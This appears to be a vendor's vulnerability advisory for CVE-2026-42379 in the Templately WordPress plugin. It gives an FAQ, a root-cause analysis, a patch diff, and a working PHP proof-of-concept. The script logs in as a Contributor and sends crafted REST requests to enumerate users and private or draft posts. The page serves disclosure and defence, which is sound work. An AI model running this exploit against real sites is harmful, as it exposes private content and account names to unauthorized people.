What is CVE-2026-42379?

CVE-2026-42379 is a medium severity vulnerability in the Templately plugin for WordPress, affecting versions up to 3.6.1. It allows authenticated users with Contributor-level access or higher to expose sensitive user and configuration data through improper handling of API requests.

How does this vulnerability work?

The vulnerability arises from insufficient validation of API parameters in the Conditions.php file. Attackers can manipulate the `query` parameter to extract sensitive information, including private posts and user data, by sending crafted requests to the WordPress REST API.

Who is affected by this vulnerability?

Any WordPress site using the Templately plugin version 3.6.1 or earlier is affected. Users with Contributor-level access or higher can exploit this vulnerability to gain unauthorized access to sensitive data.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Templately plugin installed. If it is version 3.6.1 or earlier, your site is at risk. Additionally, review access logs for any unusual API requests that may indicate exploitation.

How can I fix this vulnerability?

The vulnerability is patched in version 3.6.2 of the Templately plugin. Updating the plugin to this version or later will mitigate the risk associated with CVE-2026-42379. Regularly check for updates to ensure ongoing security.

What does the CVSS score of 4.3 indicate?

A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk and should be addressed promptly to prevent potential data exposure.

What are the practical risks of this vulnerability?

If exploited, this vulnerability allows attackers to enumerate user accounts and access private content, which can lead to further attacks such as brute force attempts or social engineering. This can compromise the security of the WordPress site and its users.

What is the role of the proof of concept?

The proof of concept provides a practical example of how the vulnerability can be exploited. It outlines the steps an attacker would take to authenticate and send crafted requests to extract sensitive data, thereby illustrating the risk associated with the vulnerability.

What specific data can be exposed?

Attackers can potentially access private posts, drafts, and user information, including usernames and display names. This information can be used for further attacks or to gain insights into site operations.

How does the patch address the vulnerability?

The patch in version 3.6.2 implements strict validation of API parameters, adds capability checks for sensitive queries, and sanitizes input to prevent unauthorized access to restricted data. These measures significantly reduce the risk of exploitation.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider restricting access to the WordPress admin area and monitoring user activity closely. Additionally, review and limit Contributor-level access to trusted users only until the plugin can be updated.

Where can I find more information about this vulnerability?

More information about CVE-2026-42379 can be found on the official CVE database, security blogs, and the Templately plugin documentation. It is advisable to stay informed about security practices and updates related to WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 18, 2026

CVE-2026-42379: Templately – Elementor & Gutenberg Template Library: 6500+ Free & Pro Ready Templates And Cloud! <= 3.6.1 – Authenticated (Contributor+) Information Exposure (templately)

CVE ID CVE-2026-42379

Plugin templately

Severity Medium (CVSS 4.3)

CWE 200

Vulnerable Version 3.6.1

Patched Version 3.6.2

Disclosed April 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-42379:

This is an information exposure vulnerability in the Templately plugin for WordPress, affecting all versions up to and including 3.6.1. The vulnerability allows authenticated attackers with Contributor-level access or higher to extract sensitive user or configuration data through the plugin’s Conditions API endpoint. The CVSS score is 4.3 (Medium).

The root cause lies in the `Conditions.php` file within the `templately/includes/API/` directory. The vulnerable function, located around lines 89-130, handles the `query` parameter from the API request. The original code lacked proper validation of the `type` and `field` parameters, which allowed an attacker to specify arbitrary query types and fields. Additionally, the `query[‘query’]` parameter was passed directly to `wp_parse_args` without sanitization, enabling attackers to inject arbitrary WP_Query arguments. The code also failed to restrict the `authors` query type to users with the `list_users` capability. The specific issue is that an attacker could query for posts with any status (including draft or private) or enumerate users by specifying `field=ID` and using numeric payloads.

An authenticated attacker with Contributor-level access can exploit this by sending a crafted POST request to the WordPress REST API endpoint or AJAX handler that invokes the `Conditions::get_conditions` method. The attacker sets the `type` parameter to `posts` and the `field` parameter to `ID`, then provides a numeric `payload` to enumerate post IDs. By chaining the `query` parameter with `post_status=private,draft,pending`, the attacker can extract sensitive post data that should be restricted to higher-privileged users. Furthermore, by setting `type=authors` and `field=user_nicename`, the attacker can enumerate all registered usernames without the `list_users` capability.

The patch, introduced in version 3.6.2, implements three key fixes. First, it adds an `$allowed_fields` whitelist that restricts `type` values to `authors`, `posts`, or `taxonomy`, and `field` values to specific database columns per type. Second, it adds a capability check for `current_user_can(‘list_users’)` when querying authors. Third, it sanitizes the `query[‘query’]` parameter by only allowing a predefined set of safe keys (`post_type`, `posts_per_page`, `number`, `orderby`, `order`, `taxonomy`, `parent`, `hide_empty`). The patch also explicitly sets `post_status` to `publish` and `perm` to `readable` when querying posts, preventing unauthorized access to non-public posts.

If successfully exploited, an attacker with only Contributor-level access can enumerate all WordPress user accounts (including admin usernames) by querying the authors endpoint, and can discover private, draft, or pending posts that should only be visible to editors or administrators. This can lead to further targeted attacks such as brute force or social engineering campaigns against privileged users, or theft of confidential content that is not yet published.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/templately/assets/js/tailwind.asset.php
+++ b/templately/assets/js/tailwind.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => '8ad18c36d0865d37bd8f');
+<?php return array('dependencies' => array(), 'version' => '2d1cd0f2c672a29d41f1');
--- a/templately/assets/js/templately.asset.php
+++ b/templately/assets/js/templately.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wp-api-fetch', 'wp-blocks', 'wp-components', 'wp-data', 'wp-dom-ready', 'wp-element', 'wp-hooks', 'wp-i18n', 'wp-media-utils', 'wp-url'), 'version' => '027e625c582479875801');
+<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wp-api-fetch', 'wp-blocks', 'wp-components', 'wp-data', 'wp-dom-ready', 'wp-element', 'wp-hooks', 'wp-i18n', 'wp-media-utils', 'wp-url'), 'version' => '8a5522a33d8cf3d22062');
--- a/templately/includes/API/Conditions.php
+++ b/templately/includes/API/Conditions.php
@@ -96,29 +96,44 @@
 		$query = $request->get_param( 'query' );
 		$type  = $query['query_type'] ?? '';

-		if ( empty( $type ) ) {
-			// FIXME: need throw error maybe
+		$allowed_fields = [
+			'authors'  => [ 'ID', 'user_nicename', 'display_name' ],
+			'posts'    => [ 'ID', 'post_title', 'post_name' ],
+			'taxonomy' => [ 'term_id', 'slug', 'name' ],
+		];
+
+		if ( empty( $type ) || ! isset( $allowed_fields[ $type ] ) ) {
 			return $this->success( [] );
 		}

 		$by_field = $query['field'] ?? '';

-		if ( empty( $by_field ) ) {
-			// FIXME: need throw error maybe
+		if ( empty( $by_field ) || ! in_array( $by_field, $allowed_fields[ $type ], true ) ) {
+			return $this->success( [] );
+		}
+
+		if ( 'authors' === $type && ! current_user_can( 'list_users' ) ) {
 			return $this->success( [] );
 		}

 		$payload = sanitize_text_field( $request->get_param( 'payload' ) );
 		$args    = [ 'search' => $payload ];
-		if(is_numeric($payload)){
-			$args = [ 'post__in' => [(int) $payload] ];
+		if ( is_numeric( $payload ) ) {
+			$args = [ 'post__in' => [ (int) $payload ] ];
 		}

-		if ( isset( $query['query'] ) ) {
-			$args = wp_parse_args( $query['query'], $args );
+		if ( isset( $query['query'] ) && is_array( $query['query'] ) ) {
+			$safe_query_keys = [
+				'post_type', 'posts_per_page', 'number', 'orderby', 'order',
+				'taxonomy', 'parent', 'hide_empty',
+			];
+			$safe_query = array_intersect_key( $query['query'], array_flip( $safe_query_keys ) );
+			$args       = wp_parse_args( $safe_query, $args );
 		}

-		$results = [];
+		$results  = [];
+		$data     = [];
+		$data_key = '';

 		switch ( $type ) {
 			case 'taxonomy':
@@ -127,9 +142,11 @@
 				$data_key = 'name';
 				break;
 			case 'posts':
-				$args['s'] = $args['search'];
-				$data      = get_posts( $args );
-				$data_key  = 'post_title';
+				$args['s']           = $args['search'];
+				$args['post_status'] = 'publish';
+				$args['perm']        = 'readable';
+				$data                = get_posts( $args );
+				$data_key            = 'post_title';
 				break;
 			case 'authors':
 				$args['search_columns'] = [ 'user_nicename', 'user_login' ];
--- a/templately/includes/Plugin.php
+++ b/templately/includes/Plugin.php
@@ -44,7 +44,7 @@
 use TemplatelyCorePlatformElementor;

 final class Plugin extends Base {
-    public $version = '3.6.1';
+    public $version = '3.6.2';

 	public $admin;
 	public $settings;
--- a/templately/templately.php
+++ b/templately/templately.php
@@ -5,7 +5,7 @@
  * Description: The Best Templates Cloud for Elementor & Gutenberg. Get access to stunning templates, WorkSpace, Cloud Library & many more.
  * Plugin URI: https://templately.com
  * Author: Templately
- * Version: 3.6.1
+ * Version: 3.6.2
  * Author URI: https://templately.com/
  * Text Domain: templately
  * Domain Path: /languages
--- a/templately/vendor/composer/installed.php
+++ b/templately/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'templately/templately',
-        'pretty_version' => 'v3.6.1',
-        'version' => '3.6.1.0',
-        'reference' => 'ae9cc19cbf2466fc266746414bea5fe15280a2a7',
+        'pretty_version' => 'v3.6.2',
+        'version' => '3.6.2.0',
+        'reference' => '58c1b822173410b677e4f265354df5c17c07e7e9',
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -20,9 +20,9 @@
             'dev_requirement' => false,
         ),
         'templately/templately' => array(
-            'pretty_version' => 'v3.6.1',
-            'version' => '3.6.1.0',
-            'reference' => 'ae9cc19cbf2466fc266746414bea5fe15280a2a7',
+            'pretty_version' => 'v3.6.2',
+            'version' => '3.6.2.0',
+            'reference' => '58c1b822173410b677e4f265354df5c17c07e7e9',
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-42379 - Templately – Elementor & Gutenberg Template Library: 6500+ Free & Pro Ready Templates And Cloud! <= 3.6.1 - Authenticated (Contributor+) Information Exposure

$target_url = 'http://example.com'; // Change this to the target WordPress site URL
$username = 'contributor'; // Change this to a Contributor-level username
$password = 'password'; // Change this to the password

// Step 1: Authenticate and get WordPress nonces
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
    die('Authentication failed. Check credentials or target URL.');
}

// Step 2: Obtain a REST API nonce (needed for Templately endpoint)
$admin_url = $target_url . '/wp-admin/admin-ajax.php';
$nonce_data = array(
    'action' => 'wp_rest_nonce'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($nonce_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

$nonce = json_decode($response, true);
if (!isset($nonce['nonce'])) {
    // Fallback: try to get nonce from admin page
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $response = curl_exec($ch);
    curl_close($ch);
    preg_match('/"wpApiSettings":{"root":"[^"]+","nonce":"([^"]+)"/', $response, $matches);
    $nonce = isset($matches[1]) ? $matches[1] : '';
} else {
    $nonce = $nonce['nonce'];
}

if (empty($nonce)) {
    echo "[!] Could not obtain REST API nonce. Trying without nonce...n";
}

// Step 3: Exploit the vulnerability - enumerate all users (authors endpoint)
echo "[+] Step 1: Enumerating all WordPress users via authors endpoint...n";

$rest_url = $target_url . '/wp-json/templately/v1/conditions';
$payload = array(
    'query' => array(
        'query_type' => 'authors',
        'field' => 'display_name'
    ),
    'payload' => '' // Empty payload returns all results when is_numeric check is false
);

$headers = array(
    'Content-Type: application/json',
    'X-WP-Nonce: ' . $nonce
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: $http_coden";
echo "Response body:n$responsenn";

$decoded = json_decode($response, true);
if (isset($decoded['data']) && is_array($decoded['data'])) {
    echo "[+] Successfully extracted user data:n";
    foreach ($decoded['data'] as $user) {
        echo "  - ID: " . $user['ID'] . ", Username: " . $user['user_nicename'] . ", Display Name: " . $user['display_name'] . "n";
    }
} else {
    echo "[!] Failed to extract user data. The site may be patched or requires different parameters.n";
}

// Step 4: Exploit to get private/draft posts
echo "n[+] Step 2: Attempting to enumerate non-public posts...n";

$payload2 = array(
    'query' => array(
        'query_type' => 'posts',
        'field' => 'ID',
        'query' => array(
            'post_type' => 'any',
            'posts_per_page' => 10,
            'post_status' => 'private,draft,pending', // Attempt to bypass visibility
            'orderby' => 'date',
            'order' => 'DESC'
        )
    ),
    'payload' => ''
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload2));
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: $http_coden";
echo "Response body:n$responsen";

$decoded2 = json_decode($response, true);
if (isset($decoded2['data']) && is_array($decoded2['data'])) {
    echo "[+] Successfully extracted post data:n";
    foreach ($decoded2['data'] as $post) {
        echo "  - ID: " . $post['ID'] . ", Title: " . $post['post_title'] . ", Slug: " . $post['post_name'] . "n";
    }
} else {
    echo "[!] Failed to extract post data or endpoint is protected.n";
}

// Clean up
unlink('/tmp/cookies.txt');

Frequently Asked Questions

What is CVE-2026-42379?
Overview of the vulnerability
CVE-2026-42379 is a medium severity vulnerability in the Templately plugin for WordPress, affecting versions up to 3.6.1. It allows authenticated users with Contributor-level access or higher to expose sensitive user and configuration data through improper handling of API requests.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient validation of API parameters in the Conditions.php file. Attackers can manipulate the `query` parameter to extract sensitive information, including private posts and user data, by sending crafted requests to the WordPress REST API.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Templately plugin version 3.6.1 or earlier is affected. Users with Contributor-level access or higher can exploit this vulnerability to gain unauthorized access to sensitive data.
How can I check if my site is vulnerable?
Assessment steps
To check if your site is vulnerable, verify the version of the Templately plugin installed. If it is version 3.6.1 or earlier, your site is at risk. Additionally, review access logs for any unusual API requests that may indicate exploitation.
How can I fix this vulnerability?
Recommended actions
The vulnerability is patched in version 3.6.2 of the Templately plugin. Updating the plugin to this version or later will mitigate the risk associated with CVE-2026-42379. Regularly check for updates to ensure ongoing security.
What does the CVSS score of 4.3 indicate?
Understanding risk levels
A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk and should be addressed promptly to prevent potential data exposure.
What are the practical risks of this vulnerability?
Potential consequences
If exploited, this vulnerability allows attackers to enumerate user accounts and access private content, which can lead to further attacks such as brute force attempts or social engineering. This can compromise the security of the WordPress site and its users.
What is the role of the proof of concept?
Demonstrating the vulnerability
The proof of concept provides a practical example of how the vulnerability can be exploited. It outlines the steps an attacker would take to authenticate and send crafted requests to extract sensitive data, thereby illustrating the risk associated with the vulnerability.
What specific data can be exposed?
Types of sensitive information
Attackers can potentially access private posts, drafts, and user information, including usernames and display names. This information can be used for further attacks or to gain insights into site operations.
How does the patch address the vulnerability?
Improvements made in the update
The patch in version 3.6.2 implements strict validation of API parameters, adds capability checks for sensitive queries, and sanitizes input to prevent unauthorized access to restricted data. These measures significantly reduce the risk of exploitation.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider restricting access to the WordPress admin area and monitoring user activity closely. Additionally, review and limit Contributor-level access to trusted users only until the plugin can be updated.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-42379 can be found on the official CVE database, security blogs, and the Templately plugin documentation. It is advisable to stay informed about security practices and updates related to WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations